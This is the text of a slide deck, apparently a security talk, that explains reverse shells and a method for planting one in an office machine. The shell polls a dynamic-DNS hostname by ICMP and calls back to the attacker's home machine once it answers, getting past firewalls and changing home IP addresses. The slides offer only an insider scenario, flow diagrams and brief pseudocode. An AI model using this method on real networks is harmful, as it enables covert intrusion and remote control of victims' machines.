Spawning Reverse Shell Spawning Reverse Shell Anytime With Any IP ! Anytime With Any IP ! Bhaumik Merchant Bhaumik Merchant
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Spawning Reverse ShellSpawning Reverse ShellAnytime With Any IP !Anytime With Any IP !
Bhaumik MerchantBhaumik Merchant
Author And Speaker at….
Objectives
• Reverse shell basics• Advance reverse shell method• Dynamic DNS concepts• Demo
Let’s Consider One Scenario To Understand Reverse Shell Attack……
• Jack works in a corporate environment which is protected by IPSs , IDSs , Firewalls etc.
• He plans for an attack , and decides to plant reverse shell , because few security mechanisms permit some amount of out bound traffic.
• He wants to spawn the shell from his office machine to home machine after 6 p.m, i.e. once he reaches his home.
• Jack wants one live system which is up and going, plus a handler running on it at his place, to receive the shell.
• Jack must know the IP address of his home machine before planting the shell in the office machine.
Then what is the roadblock for Jack?
• Jack’s home machine should be working during the office hours with the handler listening on some port to get the shell .
• Jack should know the IP address of his home machine before planting the shell into office machine.
• But if he is using PPP or DHCP mechanism then IP address will change for each connect and disconnect. (ISPs allocates Dynamic IP to home users, e.g. Home Routers , Internet Dongles)
What Is The Original Problem In Following The Formal Way To Spawn Reverse-Shell?
• Your Place• Your Time• Your IP
#include < reverse-shell.h>
One• Handler started in the attacker machine.
Two
• Payload transfer phase from attacker to victim machine.
Three• Reverse Shell or msf payload injected in the victim’s
machine.
Four• Attacker get’s victim’s bash/cmd (Attack !! )
Formal Way To Spawn The Reverse Shell !
Attacker
Handler Started In The Attacker’s Machine
Inject Shell Into The Victim’s Machine
Handler Gets The Reverse Shell
Game Over !
Formal Flow Of Reverse-Shell - IAttacker
Start Handler
If Handler Is Started ?
Wait For Reverse-Shell
Get Reverse-Shell
Game Over !
Yes
No
Dynamic Flow Of Reverse-Shell - IIAttacker
Start Handler
If Handler Is Started ?
Wait For Reverse-Shell
Get Reverse-Shell
Game Over !
Yes
YesHandler started or may not have started but still you can plant reverse shell
Base Level Mechanism (Diagram)
EXE - I
EXE - II
EXE-I :- Existence check for attacker , whether online or offline
EXE-I I :- Transfer reverse shell to attacker machine, Any Payload.
Synchronous Execution
So How It Works (I) ?
Attacker Machine Listening For Reverse Shell
Victim’s Machine Sends Some Packets To Check
The Existence Of Attacker
EXE – I In Execution
A
V
So How It Works (II) ?
Attacker Machine Listening For Reverse Shell
Victim’s Machine Sends Some Packets To Check
The Existence Of Attacker
Execution Of EXE – I Completed !
A
V
So How It Works (III) ?
Attacker Machine Listening For Reverse Shell
Victim’s Machine Sends Some Packets To Check
The Existence Of Attacker
Execution Of EXE – II Started N Game Over !
A
V
#include < my-method.h>
Dynamic Flow Of Reverse-Shell - IIAttacker
Start Handler
If Handler Is Stared ?
Wait For Reverse-Shell
Get Reverse-Shell
Game Over !
Yes
YesHandler is started or may not have been started but still you can plant reverse shell
While(true){
if( icmp reply from hh2012.dynamic-update.com){
break;}
}
Void Reverse_Shell_Transfer(){
Transfer Reverse Shell;}
How To Program it ?
Captured DNS Request Made By Normal Browser
Captured DNS Request Made By Our EXE In Live Attack
Let’s Get Our Hands Dirty !
#include < demo.h>
Related Documents
